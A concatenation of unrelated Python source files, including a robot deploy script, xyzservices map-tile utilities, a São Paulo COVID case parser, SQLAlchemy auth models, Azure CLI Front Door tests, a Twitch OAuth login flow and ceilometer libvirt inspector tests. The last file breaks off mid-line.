necessary folders and files, loads environment defaults :param configure: bool :param execute_only: bool :param backup: bool :param sync_log: bool :param start_session: bool :param tar: bool :param exam: bool """ # Flags and variables setup self.configure = configure self.execute_only = execute_only self.backup = backup self.sync_log = sync_log self.start_session = start_session self.tar = tar self.exam = exam self.settings = dict() # Path and File setup self.base_path = Path(os.path.dirname(os.path.abspath(__file__))) self.bin_path = self.base_path.joinpath('.bin') self.bin_path.mkdir(mode=0o700, exist_ok=True) self.settings_file = self.bin_path.joinpath('settings.json') # Start re-configuration or create new one if self.configure or not self.settings_file.exists(): self.__setup_deploy() # Load configuration with self.settings_file.open() as file: self.settings = json.load(file) def routine(self): """ Handle flags and starts tmux session :return: void """ if self.settings['os'] == 'Windows': system = Windows(self.configure, self.base_path, self.bin_path, self.settings, self.exam) else: system = Unix(self.configure, self.base_path, self.bin_path, self.settings, self.exam) try: if self.backup: system.backup() return if self.sync_log: system.sync_log() return if self.execute_only: if not self.tar or not system.copy_files_tar(): system.copy_files() if self.start_session: system.start_session() finally: system.cleanup() return def __setup_deploy(self): """ Creates or updates Deploy-Script configuration :return: void """ init_dict = dict() init_dict['os'] = platform.system() init_dict['ip'] = ip_check() # Dump data into file self.settings_file.touch() with self.settings_file.open('w') as file: json.dump(init_dict, file, indent=4) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument( '-c', '--configure', help='Create new or reset current configuration', action='store_true') parser.add_argument( '-e', '--execute-only', help='Execute only without copying new files', action='store_false', default=True) parser.add_argument( '-b', '--backup', help='Create a remote backup of your files on the brick', action='store_true', default=False) parser.add_argument( '-s', '--sync-log', help='Synchronize log files from the brick', action='store_true', default=False) parser.add_argument( '-r', '--reload', help='Only copy files / reload, but do not start a new session', action="store_true", default=False) parser.add_argument( "-t", "--tar", help='Use the tar method to copy files (implies -r)', action='store_true', default=False) parser.add_argument( '-E', '--exam', help='Run in exam mode (clean src before executing)', action='store_true', default=False) args = parser.parse_args() print("Starting deploy at " + str(time.time())) try: print('If you need to change the IP address or your underlying OS, please run\n\t./deploy.py -c') deploy = Deploy(args.configure, args.execute_only, args.backup, args.sync_log, not args.reload and not args.tar, args.tar, args.exam) deploy.routine() except Exception as e: print(e) raise """ Utilities to support XYZservices """ import json import uuid from typing import Optional class Bunch(dict): """A dict with attribute-access :class:`Bunch` is used to store :class:`TileProvider` objects. Examples -------- >>> black_and_white = TileProvider( ... name="My black and white tiles", ... url="https://myserver.com/bw/{z}/{x}/{y}", ... attribution="(C) xyzservices", ... ) >>> colorful = TileProvider( ... name="My colorful tiles", ... url="https://myserver.com/color/{z}/{x}/{y}", ... attribution="(C) xyzservices", ... ) >>> MyTiles = Bunch(BlackAndWhite=black_and_white, Colorful=colorful) >>> MyTiles {'BlackAndWhite': {'name': 'My black and white tiles', 'url': \ 'https://myserver.com/bw/{z}/{x}/{y}', 'attribution': '(C) xyzservices'}, 'Colorful': \ {'name': 'My colorful tiles', 'url': 'https://myserver.com/color/{z}/{x}/{y}', \ 'attribution': '(C) xyzservices'}} >>> MyTiles.BlackAndWhite.url 'https://myserver.com/bw/{z}/{x}/{y}' """ def __getattr__(self, key): try: return self.__getitem__(key) except KeyError: raise AttributeError(key) def __dir__(self): return self.keys() def _repr_html_(self, inside=False): children = "" for key in self.keys(): if isinstance(self[key], TileProvider): obj = "xyzservices.TileProvider" else: obj = "xyzservices.Bunch" uid = str(uuid.uuid4()) children += f"""
  • {self[key]._repr_html_(inside=True)}
  • """ style = "" if inside else f"" html = f"""
    {style}
    xyzservices.Bunch
    {len(self)} items
      {children}
    """ return html class TileProvider(Bunch): """ A dict with attribute-access and that can be called to update keys Examples -------- You can create custom :class:`TileProvider` by passing your attributes to the object as it would have been a ``dict()``. It is required to always specify ``name``, ``url``, and ``attribution``. >>> public_provider = TileProvider( ... name="My public tiles", ... url="https://myserver.com/tiles/{z}/{x}/{y}.png", ... attribution="(C) xyzservices", ... ) Alternatively, you can create it from a dictionary of attributes. When specifying a placeholder for the access token, please use the ``""`` string to ensure that :meth:`~xyzservices.TileProvider.requires_token` method works properly. >>> private_provider = TileProvider( ... { ... "url": "https://myserver.com/tiles/{z}/{x}/{y}.png?apikey={accessToken}", ... "attribution": "(C) xyzservices", ... "accessToken": "", ... "name": "my_private_provider", ... } ... ) You can then fetch all information as attributes: >>> public_provider.url 'https://myserver.com/tiles/{z}/{x}/{y}.png' >>> public_provider.attribution '(C) xyzservices' To ensure you will be able to use the tiles, you can check if the :class:`TileProvider` requires a token or API key. >>> public_provider.requires_token() False >>> private_provider.requires_token() True You can also generate URL in the required format with or without placeholders: >>> public_provider.build_url() 'https://myserver.com/tiles/{z}/{x}/{y}.png' >>> private_provider.build_url(x=12, y=21, z=11, accessToken="my_token") 'https://myserver.com/tiles/11/12/21.png?access_token=my_token' """ def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) missing = [] for el in ["name", "url", "attribution"]: if el not in self.keys(): missing.append(el) if len(missing) > 0: msg = ( f"The attributes `name`, `url`, " f"and `attribution` are required to initialise " f"a `TileProvider`. Please provide values for: " f'`{"`, `".join(missing)}`' ) raise AttributeError(msg) def __call__(self, **kwargs): new = TileProvider(self) # takes a copy preserving the class new.update(kwargs) return new def copy(self, **kwargs): new = TileProvider(self) # takes a copy preserving the class return new def build_url( self, x: Optional[int] = None, y: Optional[int] = None, z: Optional[int] = None, scale_factor: Optional[str] = None, **kwargs, ) -> str: """ Build the URL of tiles from the :class:`TileProvider` object Can return URL with placeholders or the final tile URL. Parameters ---------- x, y, z : int (optional) tile number scale_factor : str (optional) Scale factor (where supported). For example, you can get double resolution (512 x 512) instead of standard one (256 x 256) with ``"@2x"``. If you want to keep a placeholder, pass `"{r}"`. **kwargs Other potential attributes updating the :class:`TileProvider`. Returns ------- url : str Formatted URL Examples -------- >>> import xyzservices.providers as xyz >>> xyz.CartoDB.DarkMatter.build_url() 'https://a.basemaps.cartocdn.com/dark_all/{z}/{x}/{y}.png' >>> xyz.CartoDB.DarkMatter.build_url(x=9, y=11, z=5) 'https://a.basemaps.cartocdn.com/dark_all/5/9/11.png' >>> xyz.CartoDB.DarkMatter.build_url(x=9, y=11, z=5, scale_factor="@2x") 'https://a.basemaps.cartocdn.com/dark_all/5/9/11@2x.png' >>> xyz.MapBox.build_url(accessToken="my_token") 'https://api.mapbox.com/styles/v1/mapbox/streets-v11/tiles/{z}/{x}/{y}?access_token=my_token' """ provider = self.copy() if x is None: x = "{x}" if y is None: y = "{y}" if z is None: z = "{z}" provider.update(kwargs) if provider.requires_token(): raise ValueError( "Token is required for this provider, but not provided. " "You can either update TileProvider or pass respective keywords " "to build_url()." ) url = provider.pop("url") subdomains = provider.pop("subdomains", "abc") if scale_factor: r = scale_factor provider.pop("r", None) else: r = provider.pop("r", "") return url.format(x=x, y=y, z=z, s=subdomains[0], r=r, **provider) def requires_token(self) -> bool: """ Returns ``True`` if the TileProvider requires access token to fetch tiles. The token attribute name vary and some :class:`TileProvider` objects may require more than one token (e.g. ``HERE``). The information is deduced from the presence of `'"`` string to ensure that :meth:`~xyzservices.TileProvider.requires_token` method works properly. Returns ------- bool Examples -------- >>> import xyzservices.providers as xyz >>> xyz.MapBox.requires_token() True >>> xyz.CartoDB.Positron False We can specify this API key by calling the object or overriding the attribute. Overriding the attribute will alter existing object: >>> xyz.OpenWeatherMap.Clouds["apiKey"] = "my-private-api-key" Calling the object will return a copy: >>> xyz.OpenWeatherMap.Clouds(apiKey="my-private-api-key") """ # both attribute and placeholder in url are required to make it work for key, val in self.items(): if isinstance(val, str) and "{key}
    {val}
    " style = "" if inside else f"" html = f"""
    {style}
    xyzservices.TileProvider
    {self.name}
    {provider_info}
    """ return html def _load_json(f): data = json.loads(f) providers = Bunch() for provider_name in data.keys(): provider = data[provider_name] if "url" in provider.keys(): providers[provider_name] = TileProvider(provider) else: providers[provider_name] = Bunch( {i: TileProvider(provider[i]) for i in provider} ) return providers CSS_STYLE = """ /* CSS stylesheet for displaying xyzservices objects in Jupyter.*/ .xyz-header { padding-top: 6px; padding-bottom: 6px; margin-bottom: 4px; border-bottom: solid 1px #ddd; } .xyz-header>div { display: inline; margin-top: 0; margin-bottom: 0; } .xyz-obj, .xyz-name { margin-left: 2px; margin-right: 10px; } .xyz-obj { color: #555; } .xyz-name { color: #000; } .xyz-attrs { grid-column: 1 / -1; } dl.xyz-attrs { padding: 0; margin: 0; display: grid; grid-template-columns: 125px auto; background-color: rgb(244, 244, 244); } .xyz-attrs dt, dd { padding: 0; margin: 0; float: left; padding-right: 10px; width: auto; } .xyz-attrs dt { font-weight: normal; grid-column: 1; } .xyz-attrs dt:hover span { display: inline-block; background: #fff; padding-right: 10px; } .xyz-attrs dd { grid-column: 2; white-space: pre-wrap; word-break: break-all; } .xyz-details ul>li>label>span { color: #555; padding-left: 10px; } .xyz-inside { display: none; } .xyz-checkbox:checked~.xyz-inside { display: contents; } .xyz-collapsible li>input { display: none; } .xyz-collapsible>li>label { cursor: pointer; } .xyz-collapsible>li>label:hover { color: #555; } ul.xyz-collapsible { list-style: none!important; padding-left: 20px!important; } .xyz-checkbox+label:before { content: '►'; font-size: 11px; } .xyz-checkbox:checked+label:before { content: '▼'; } .xyz-wrap { margin-bottom: 10px; } """ from JumpScale import j import time j.application.start("jumpscale:watchdogmanager") import JumpScale.baselib.watchdog.manager while True: print "check" j.tools.watchdog.manager.checkWatchdogEvents() time.sleep(5) j.application.stop() ingestion/functions/parsing/saopaolo/saopaolo.py import os import sys from datetime import datetime import csv # Layer code, like parsing_lib, is added to the path by AWS. # To test locally (e.g. via pytest), we have to modify sys.path. # pylint: disable=import-error try: import parsing_lib except ImportError: sys.path.append( os.path.join( os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "common/python" ) ) import parsing_lib def convert_date(raw_date): """ Convert raw date field into a value interpretable by the dataserver. """ date = datetime.strptime(raw_date, "%Y-%m-%d") return date.strftime("%m/%d/%YZ") def parse_cases(raw_data_file: str, source_id: str, source_url: str): """ Parses G.h-format case data from raw API data. Some caveats: 1. There are no patient ID/case ID in the raw API so we aren't able to dedupe. 2. We can't link confirmed cases and confirmed deaths because of (1) so we're only importing confirmed cases and ignoring deaths. """ with open(raw_data_file, "r") as f: reader = csv.DictReader(f, delimiter=";") for row in reader: num_confirmed_cases = int(row["casos_novos"]) if (not num_confirmed_cases) or (row["nome_munic"] == "Ignorado"): continue try: when = convert_date(row["datahora"]) case = { "caseReference": {"sourceId": source_id, "sourceUrl": source_url}, "location": {"query": f"{row['nome_munic']}, São Paulo, Brazil"}, "events": [ { "name": "confirmed", "dateRange": { "start": when, "end": when, }, }, ], } for _ in range(num_confirmed_cases): yield case except ValueError as ve: raise ValueError("Unhandled data: {}".format(ve)) def lambda_handler(event, context): return parsing_lib.run_lambda(event, context, parse_cases) from sqlalchemy import event from sqlalchemy.orm import relationship from sqlalchemy.schema import Table, Column, ForeignKey from sqlalchemy.types import LargeBinary, String from .base import Base, BaseMixin class User(Base, BaseMixin): email = Column(String(length=100), nullable=False, unique=True) name = Column(String(length=100)) username = Column(String(length=100), unique=True) password = Column(LargeBinary(60), nullable=False) roles = relationship('Role', secondary='user_role') @property def permissions(self): perms = set() for role in self.roles: perms.update(role.permissions) return perms def has_role(self, key): keys = set(role.key for role in self.roles) if 'sudo' in keys: return True return key in keys def has_permission(self, key): keys = set(permission.key for permission in self.permissions) if 'sudo' in keys: return True return key in keys @event.listens_for(User.password, 'set', retval=True) def hash_password(user, plain_text_password, old_hashed_password, event): import tangled.site.auth return tangled.site.auth.hash_password(plain_text_password) class Permission(Base): __tablename__ = 'permission' key = Column(String(length=50), primary_key=True) description = Column(String(length=100)) class Role(Base): __tablename__ = 'role' key = Column(String(length=50), primary_key=True) description = Column(String(length=100)) permissions = relationship(Permission, secondary='role_permission') role_permission_table = Table( 'role_permission', Base.metadata, Column('role_key', ForeignKey(Role.key), primary_key=True), Column('permission_key', ForeignKey(Permission.key), primary_key=True)) user_role_table = Table( 'user_role', Base.metadata, Column('user_id', ForeignKey(User.id), primary_key=True), Column('role_key', ForeignKey(Role.key), primary_key=True)) # -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from azure.cli.testsdk import ResourceGroupPreparer, JMESPathCheck from azure.cli.testsdk import ScenarioTest, record_only from .afdx_scenario_mixin import CdnAfdScenarioMixin class CdnAfdOriginScenarioTest(CdnAfdScenarioMixin, ScenarioTest): @ResourceGroupPreparer() def test_afd_origin_crud(self, resource_group): profile_name = self.create_random_name(prefix='profile', length=16) self.afd_profile_create_cmd(resource_group, profile_name, sku="Premium_AzureFrontDoor") origin_group_name = self.create_random_name(prefix='og', length=16) self.afd_origin_group_create_cmd(resource_group, profile_name, origin_group_name, "--probe-request-type GET --probe-protocol Http --probe-interval-in-seconds 120 --probe-path /test1/azure.txt " "--sample-size 4 --successful-samples-required 3 --additional-latency-in-milliseconds 50") origin_name = self.create_random_name(prefix='origin', length=16) create_options = "--host-name plstestcli.blob.core.windows.net " \ + "--origin-host-header plstestcli.blob.core.windows.net " \ + "--priority 1 --weight 1000 --http-port 80 --https-port 443 --enabled-state Enabled" create_checks = [JMESPathCheck('name', origin_name), JMESPathCheck('hostName', "plstestcli.blob.core.windows.net"), JMESPathCheck('httpPort', 80), JMESPathCheck('httpsPort', 443), JMESPathCheck('priority', 1), JMESPathCheck('weight', 1000), JMESPathCheck('enabledState', "Enabled"), JMESPathCheck('enforceCertificateNameCheck', True), JMESPathCheck('provisioningState', 'Succeeded')] self.afd_origin_create_cmd(resource_group, profile_name, origin_group_name, origin_name, create_options, create_checks) origin_name1 = self.create_random_name(prefix='origin', length=16) create_options = "--host-name huaiyiztesthost1.blob.core.chinacloudapi.cn " \ + "--enforce-certificate-name-check false " \ + "--origin-host-header huaiyiztesthost1.blob.core.chinacloudapi.cn " \ + "--priority 1 --weight 666 --http-port 8080 --https-port 443 --enabled-state Enabled" create_checks = [JMESPathCheck('name', origin_name1), JMESPathCheck('hostName', "huaiyiztesthost1.blob.core.chinacloudapi.cn"), JMESPathCheck('httpPort', 8080), JMESPathCheck('httpsPort', 443), JMESPathCheck('priority', 1), JMESPathCheck('weight', 666), JMESPathCheck('enabledState', "Enabled"), JMESPathCheck('enforceCertificateNameCheck', False), JMESPathCheck('provisioningState', 'Succeeded')] self.afd_origin_create_cmd(resource_group, profile_name, origin_group_name, origin_name1, create_options, create_checks) list_checks = [JMESPathCheck('length(@)', 2), JMESPathCheck('@[0].name', origin_name), JMESPathCheck('@[1].name', origin_name1)] self.afd_origin_list_cmd(resource_group, profile_name, origin_group_name, checks=list_checks) update_checks = [JMESPathCheck('name', origin_name), JMESPathCheck('hostName', "plstestcli.blob.core.windows.net"), JMESPathCheck('httpPort', 8080), JMESPathCheck('httpsPort', 443), JMESPathCheck('priority', 1), JMESPathCheck('weight', 58), JMESPathCheck('enabledState', "Enabled"), JMESPathCheck('enforceCertificateNameCheck', False), JMESPathCheck('provisioningState', 'Succeeded')] options = '--weight 58 --http-port 8080 --enforce-certificate-name-check false' self.afd_origin_update_cmd(resource_group, profile_name, origin_group_name, origin_name, options=options, checks=update_checks) update_checks = [JMESPathCheck('name', origin_name), JMESPathCheck('hostName', "plstestcli.blob.core.windows.net"), JMESPathCheck('httpPort', 8080), JMESPathCheck('httpsPort', 443), JMESPathCheck('priority', 1), JMESPathCheck('weight', 58), JMESPathCheck('enabledState', "Enabled"), JMESPathCheck('enforceCertificateNameCheck', True), JMESPathCheck('provisioningState', 'Succeeded')] options = '--enforce-certificate-name-check true' self.afd_origin_update_cmd(resource_group, profile_name, origin_group_name, origin_name, options=options, checks=update_checks) update_checks = [JMESPathCheck('name', origin_name), JMESPathCheck('hostName', "plstestcli.blob.core.windows.net"), JMESPathCheck('httpPort', 80), JMESPathCheck('httpsPort', 443), JMESPathCheck('priority', 1), JMESPathCheck('weight', 58), JMESPathCheck('enabledState', "Enabled"), JMESPathCheck('enforceCertificateNameCheck', True), JMESPathCheck('sharedPrivateLinkResource.privateLink.id', f"/subscriptions/{self.get_subscription_id()}/resourceGroups/CliDevReservedGroup/providers/Microsoft.Storage/storageAccounts/plstestcli"), JMESPathCheck('sharedPrivateLinkResource.groupId', "blob"), JMESPathCheck('sharedPrivateLinkResource.privateLinkLocation', "eastus"), JMESPathCheck('sharedPrivateLinkResource.requestMessage', "Private link service from AFD"), JMESPathCheck('provisioningState', 'Succeeded')] options = '--http-port 80 --enable-private-link --private-link-resource ' \ + f' /subscriptions/{self.get_subscription_id()}/resourceGroups/CliDevReservedGroup/providers/Microsoft.Storage/storageAccounts/plstestcli' \ + ' --private-link-sub-resource blob' \ + ' --private-link-location eastus' \ + ' --private-link-request-message "Private link service from AFD"' self.afd_origin_update_cmd(resource_group, profile_name, origin_group_name, origin_name, options=options, checks=update_checks) update_checks = [JMESPathCheck('name', origin_name), JMESPathCheck('hostName', "plstestcli.blob.core.windows.net"), JMESPathCheck('httpPort', 80), JMESPathCheck('httpsPort', 443), JMESPathCheck('priority', 1), JMESPathCheck('weight', 58), JMESPathCheck('enabledState', "Enabled"), JMESPathCheck('enforceCertificateNameCheck', True), JMESPathCheck('sharedPrivateLinkResource.privateLink.id', f"/subscriptions/{self.get_subscription_id()}/resourceGroups/CliDevReservedGroup/providers/Microsoft.Storage/storageAccounts/plstestcli"), JMESPathCheck('sharedPrivateLinkResource.groupId', "table"), JMESPathCheck('sharedPrivateLinkResource.privateLinkLocation', "eastus"), JMESPathCheck('sharedPrivateLinkResource.requestMessage', "Private link service from AFD"), JMESPathCheck('provisioningState', 'Succeeded')] options = '--private-link-sub-resource table' self.afd_origin_update_cmd(resource_group, profile_name, origin_group_name, origin_name, options=options, checks=update_checks) update_checks = [JMESPathCheck('name', origin_name), JMESPathCheck('hostName', "plstestcli.blob.core.windows.net"), JMESPathCheck('httpPort', 80), JMESPathCheck('httpsPort', 443), JMESPathCheck('priority', 1), JMESPathCheck('weight', 99), JMESPathCheck('enabledState', "Disabled"), JMESPathCheck('enforceCertificateNameCheck', True), JMESPathCheck('sharedPrivateLinkResource', None), JMESPathCheck('provisioningState', 'Succeeded')] options = '--weight 99 --enable-private-link false --enabled-state Disabled' self.afd_origin_update_cmd(resource_group, profile_name, origin_group_name, origin_name, options=options, checks=update_checks) self.afd_origin_delete_cmd(resource_group, profile_name, origin_group_name, origin_name) self.afd_origin_delete_cmd(resource_group, profile_name, origin_group_name, origin_name1) list_checks = [JMESPathCheck('length(@)', 0)] self.afd_origin_list_cmd(resource_group, profile_name, origin_group_name, list_checks) # TODO: Generalize this with the discordutil module, factor out oauth import logging from urllib.parse import urlencode import requests import json from flask import request, redirect, session from creds import get_creds from config import config from sessionutil import invalidate_session def twitch_login(): ss = get_creds() params = { "client_id": ss["twitch_client_id"], "redirect_uri": "%s/api/ident/twitchcb" % config.MY_URL, "state": True, "response_type": "code", "scope": "openid", # not user_read, id_token, or user_subscriptions # need to request objects for the later userinfo request "claims": json.dumps({ "id_token": {}, "userinfo": { "picture": "null", "preferred_username": "null", } }) } redirect_url = "%s/oauth2/authorize?%s" % ( config.TWITCH_API_URL, urlencode(params)) return redirect(redirect_url) def twitch_login_cb(): user_authenticated = False result = "Missing code" code = request.args.get("code") scope = request.args.get("scope") if code is not None and scope == "openid": # fetch a token user_authenticated = fetch_twitch_token(code) if user_authenticated == True: user_fetch_worked = fetch_twitch_user() if not user_fetch_worked: invalidate_session() return redirect("/") return redirect("/user") return result # TODO: this should be cached until expiration # The server can reuse this for API requests # TODO: factor this out with discord auth to oauth..auth def fetch_twitch_token(code): # on success, session has the token to use ss = get_creds() result = False body_payload = { "client_id": ss["twitch_client_id"], "client_secret": ss["twitch_client_secret"], "grant_type": "authorization_code", "code": code, "redirect_uri": "%s/api/ident/twitchcb" % config.MY_URL, } # redirect_uri may need to match original cb URI (twitch_login_cb) extra_headers = { "Content-Type": "application/x-www-form-urlencoded", } response = requests.post( "%s/oauth2/token" % config.TWITCH_API_URL, data=urlencode(body_payload), headers=extra_headers) logging.debug("fetch_twitch_token: headers: %s\n\traw response: %s" % ( response.headers, response.text)) try: token_response = json.loads(response.text) if "access_token" in token_response and "refresh_token" in token_response: session["token_response"] = token_response result = True else: logging.warn("NO refresh_token AVAILABLE, BAD AUTH!") except ValueError as e: logging.error("ValueError: " + e) result = False return result def fetch_twitch_user(): if "token_response" not in session: return False token = session["token_response"] if "token_type" not in token or "access_token" not in token: return False auth_header_token_type = "" # token request returns "bearer", not "Bearer" sometimes if token["token_type"] in ["bearer", "Bearer"]: auth_header_token_type = "Bearer" # this are attached to session in fetch_twitch_token extra_headers = { "Authorization": "%s %s" % ( auth_header_token_type, token["access_token"] ), } response = requests.get( "%s/oauth2/userinfo" % config.TWITCH_API_URL, headers=extra_headers) logging.debug("fetch_twitch_user: headers: %s\n\traw response: %s" % ( response.headers, response.text)) twitch_avatar_url = None twitch_username = None twitch_id = None try: logging.debug("fetch_twitch_user response: %s" % response.text) parsed_response = json.loads(response.text) twitch_id = parsed_response["sub"] twitch_username = parsed_response["preferred_username"] twitch_avatar_url = parsed_response["picture"] except ValueError as e: logging.error("ValueError: " + e) return False ss = get_creds() # TODO: move away from "discord" to a generic auth provider session["discord"] = { "full_username": twitch_username, # TODO: get the right avatar from picture "avatar_url": twitch_avatar_url, "id": twitch_id, "authorized": twitch_id in ss["authorized_twitch_ids"] } return True ceilometer/tests/unit/compute/virt/libvirt/test_inspector.py1-10 # Copyright 2012 Red Hat, Inc # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Tests for libvirt inspector. """ try: import contextlib2 as contextlib # for Python < 3.3 except ImportError: import contextlib import fixtures import mock from oslo_utils import units from oslotest import base from ceilometer.compute.virt import inspector as virt_inspector from ceilometer.compute.virt.libvirt import inspector as libvirt_inspector class TestLibvirtInspection(base.BaseTestCase): class fakeLibvirtError(Exception): pass def setUp(self): super(TestLibvirtInspection, self).setUp() class VMInstance(object): id = 'ff58e738-12f4-4c58-acde-77617b68da56' name = 'instance-00000001' self.instance = VMInstance self.inspector = libvirt_inspector.LibvirtInspector() self.inspector.connection = mock.Mock() libvirt_inspector.libvirt = mock.Mock() libvirt_inspector.libvirt.VIR_DOMAIN_SHUTOFF = 5 libvirt_inspector.libvirt.libvirtError = self.fakeLibvirtError self.domain = mock.Mock() self.addCleanup(mock.patch.stopall) def test_inspect_cpus(self): with contextlib.ExitStack() as stack: stack.enter_context(mock.patch.object(self.inspector.connection, 'lookupByUUIDString', return_value=self.domain)) stack.enter_context(mock.patch.object(self.domain, 'info', return_value=(0, 0, 0, 2, 999999))) cpu_info = self.inspector.inspect_cpus(self.instance) self.assertEqual(2, cpu_info.number) self.assertEqual(999999, cpu_info.time) def test_inspect_cpus_with_domain_shutoff(self): connection = self.inspector.connection with mock.patch.object(connection, 'lookupByUUIDString', return_value=self.domain): with mock.patch.object(self.domain, 'info', return_value=(5, 0, 0, 2, 999999)): self.assertRaises(virt_inspector.InstanceShutOffException, self.inspector.inspect_cpus, self.instance) def test_inspect_vnics(self): dom_xml = """
    """ interface_stats = { 'vnet0': (1, 2, 0, 0, 3, 4, 0, 0), 'vnet1': (5, 6, 0, 0, 7, 8, 0, 0), 'vnet2': (9, 10, 0, 0, 11, 12, 0, 0), } interfaceStats = interface_stats.__getitem__ connection = self.inspector.connection with contextlib.ExitStack() as stack: stack.enter_context(mock.patch.object(connection, 'lookupByUUIDString', return_value=self.domain)) stack.enter_context(mock.patch.object(self.domain, 'XMLDesc', return_value=dom_xml)) stack.enter_context(mock.patch.object(self.domain, 'interfaceStats', side_effect=interfaceStats)) stack.enter_context(mock.patch.object(self.domain, 'info', return_value=(0, 0, 0, 2, 999999))) interfaces = list(self.inspector.inspect_vnics(self.instance)) self.assertEqual(3, len(interfaces)) vnic0, info0 = interfaces[0] self.assertEqual('vnet0', vnic0.name) self.assertEqual('fa:16:3e:71:ec:6d', vnic0.mac) self.assertEqual('nova-instance-00000001-fa163e71ec6d', vnic0.fref) self.assertEqual('255.255.255.0', vnic0.parameters.get('projmask')) self.assertEqual('10.0.0.2', vnic0.parameters.get('ip')) self.assertEqual('10.0.0.0', vnic0.parameters.get('projnet')) self.assertEqual('10.0.0.1', vnic0.parameters.get('dhcpserver')) self.assertEqual(1, info0.rx_bytes) self.assertEqual(2, info0.rx_packets) self.assertEqual(3, info0.tx_bytes) self.assertEqual(4, info0.tx_packets) vnic1, info1 = interfaces[1] self.assertEqual('vnet1', vnic1.name) self.assertEqual('fa:16:3e:71:ec:6e', vnic1.mac) self.assertEqual('nova-instance-00000001-fa163e71ec6e', vnic1.fref) self.assertEqual('255.255.255.0', vnic1.parameters.get('projmask')) self.assertEqual('192.168.0.2', vnic1.parameters.get('ip')) self.assertEqual('192.168.0.0', vnic1.parameters.get('projnet')) self.assertEqual('192.168.0.1', vnic1.parameters.get('dhcpserver')) self.assertEqual(5, info1.rx_bytes) self.assertEqual(6, info1.rx_packets) self.assertEqual(7, info1.tx_bytes) self.assertEqual(8, info1.tx_packets) vnic2, info2 = interfaces[2] self.assertEqual('vnet2', vnic2.name) self.assertEqual('fa:16:3e:96:33:f0', vnic2.mac) self.assertIsNone(vnic2.fref) self.assertEqual(dict(), vnic2.parameters) self.assertEqual(9, info2.rx_bytes) self.assertEqual(10, info2.rx_packets) self.assertEqual(11, info2.tx_bytes) self.assertEqual(12, info2.tx_packets) def test_inspect_vnics_with_domain_shutoff(self): connection = self.inspector.connection with contextlib.ExitStack() as stack: stack.enter_context(mock.patch.object(connection, 'lookupByUUIDString', return_value=self.domain)) stack.enter_context(mock.patch.object(self.domain, 'info', return_value=(5, 0, 0, 2, 999999))) inspect = self.inspector.inspect_vnics self.assertRaises(virt_inspector.InstanceShutOffException, list, inspect(self.instance)) def test_inspect_disks(self): dom_xml = """
    """ with contextlib.ExitStack() as stack: stack.enter_context(mock.patch.object(self.inspector.connection, 'lookupByUUIDString', return_value=self.domain)) stack.enter_context(mock.patch.object(self.domain, 'XMLDesc', return_value=dom_xml)) stack.enter_context(mock.patch.object(self.domain, 'blockStats', return_value=(1, 2, 3, 4, -1))) stack.enter_context(mock.patch.object(self.domain, 'info', return_value=(0, 0, 0, 2, 999999))) disks = list(self.inspector.inspect_disks(self.instance)) self.assertEqual(1, len(disks)) disk0, info0 = disks[0] self.assertEqual('vda', disk0.device) self.assertEqual(1, info0.read_requests) self.assertEqual(2, info0.read_bytes) self.assertEqual(3, info0.write_requests) self.assertEqual(4, info0.write_bytes) def test_inspect_disks_with_domain_shutoff(self): connection = self.inspector.connection with contextlib.ExitStack() as stack: stack.enter_context(mock.patch.object(connection, 'lookupByUUIDString', return_value=self.domain)) stack.enter_context(mock.patch.object(self.domain, 'info', return_value=(5, 0, 0, 2, 999999))) inspect = self.inspector.inspect_disks self.assertRaises(virt_inspector.InstanceShutOffException, list, inspect(self.instance)) def test_inspect_memory_usage(self): fake_memory_stats = {'available': 51200, 'unused': 25600} connection = self.inspector.connection with mock.patch.object(connection, 'lookupByUUIDString', return_value=self.domain): with mock.patch.object(self.domain, 'info', return_value=(0, 0, 51200, 2, 999999)): with mock.patch.object(self.domain, 'memoryStats', return_value=fake_memory_stats): memory = self.inspector.inspect_memory_usage( self.instance) self.assertEqual(25600 / units.Ki, memory.usage) def test_inspect_disk_info(self): dom_xml = """
    """ with contextlib.ExitStack() as stack: stack.enter_context(mock.patch.object(self.inspector.connection, 'lookupByUUIDString', return_value=self.domain)) stack.enter_context(mock.patch.object(self.domain, 'XMLDesc', return_value=dom_xml)) stack.enter_context(mock.patch.object(self.domain, 'blockInfo', return_value=(1, 2, 3, -1))) stack.enter_context(mock.patch.object(self.domain, 'info', return_value=(0, 0, 0, 2, 999999))) disks = list(self.inspector.inspect_disk_info(self.instance)) self.assertEqual(1, len(disks)) disk0, info0 = disks[0] self.assertEqual('vda', disk0.device) self.assertEqual(1, info0.capacity) self.assertEqual(2, info0.allocation) self.assertEqual(3, info0.physical) def test_inspect_memory_usage_with_domain_shutoff(self): connection = self.inspector.connection with mock.patch.object(connection, 'lookupByUUIDString', return_value=self.domain): with mock.patch.object(self.domain, 'info', return_value=(5, 0, 0, 2, 999999)): self.assertRaises(virt_inspector.InstanceShutOffException, self.inspector.inspect_memory_usage, self.instance) def test_inspect_memory_usage_with_empty_stats(self): connection = self.inspector.connection with mock.patch.object(connection, 'lookupByUUIDString', return_value=self.domain): with mock.patch.object(self.domain, 'info', return_value=(0, 0, 51200, 2, 999999)): with mock.patch.object(self.domain, 'memoryStats', return_value={}): self.assertRaises(virt_inspector.NoDataException, self.inspector.inspect_memory_usage, self.instance) class TestLibvirtInspectionWithError(base.BaseTestCase): class fakeLibvirtError(Exception): pass def setUp(self): super(TestLibvirtInspectionWithError, self).setUp() self.inspector = libvirt_inspector.LibvirtInspector() self.useFixture(fixtures.MonkeyPatch( 'ceilometer.compute.virt.libvirt.inspector.' 'LibvirtInspector._get_connection', self._dummy_get_connection)) libvirt_inspector.libvirt = mock.Mock() libvirt_inspector.libvirt.libvirtError = self.fakeLibvirtError @staticmethod def _dummy_get_connection(*args, **kwargs): raise Exception('dummy') def test_inspect_unknown_error(self): self.assertRaises(virt_inspector.InspectorException, self.inspector.inspect_cpus, 'foo') class TestLibvirtInitWithError(base.BaseTestCase): def setUp(self): super(TestLibvirtInitWithError, self).setUp() self.inspector = 